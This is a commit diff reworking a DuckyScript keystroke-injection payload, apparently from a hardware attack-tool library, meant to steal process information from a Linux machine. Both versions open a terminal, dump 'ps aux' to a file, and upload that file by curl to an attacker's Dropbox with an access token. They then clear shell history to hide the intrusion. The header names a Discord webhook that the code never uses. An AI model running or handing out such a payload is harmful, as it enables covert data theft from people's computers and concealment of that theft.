Update payload.txt

2023-06-12 14:36:12 -04:00 · 2023-06-12 14:36:12 -04:00 · 28bad45306
parent bb1dc06398
commit 28bad45306
1 changed files with 16 additions and 46 deletions
--- a/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
@ -12,61 +12,31 @@ REM Requirements:
 REM     - Internet Connection
 REM     - Discord Webhook

-DELAY 1000
-CTRL-ALT t
+REM Required: Set here your Dropbox access TOKEN
+DEFINE #TOKEN example
+DEFINE #DROPBOX_FOLDER_NAME example
+DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
+
+
+DEFAULT_DELAY 500
+CTRL ALT t
 DELAY 2000

-
 REM #### GET PROCESS SECTION ####
-
-
-STRING ps aux > process.txt
-ENTER
-DELAY 500
-
+STRINGLN ps aux > process.txt

 REM #### EXFILTRATE SECTION ####
-
-
-REM Required: Set here your Dropbox access TOKEN
-DEFINE TOKEN example
-STRING ACCESS_TOKEN="
-STRING TOKEN
-STRING "
-ENTER
-DELAY 500
-
-STRING USER_NAME=$(whoami)
-ENTER
-DELAY 500
-
-STRING TXT_PATH="/home/$USER_NAME/process.txt"
-ENTER
-DELAY 500
+STRINGLN ACCESS_TOKEN="#TOKEN"
+STRINGLN USER_NAME=$(whoami)
+STRINGLN TXT_PATH="/home/$USER_NAME/process.txt"

 REM Set yout Dropbox folder name
-DEFINE DROPBOX_FOLDER_NAME example
-STRING DROPBOX_FOLDER="/
-STRING DROPBOX_FOLDER_NAME
-STRING "
-ENTER
-DELAY 500
-
-DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
-STRING curl -X POST
-STRING DROPBOX_API_CONST
-STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
-ENTER
+STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
+STRINGLN curl -X POST #DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"

 REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient
 DELAY 2000

-
 REM #### REMOVE TRACES ####
-
-
-STRING history -c
-ENTER
-DELAY 500
-STRING exit
-ENTER
+STRINGLN history -c
+STRINGLN exit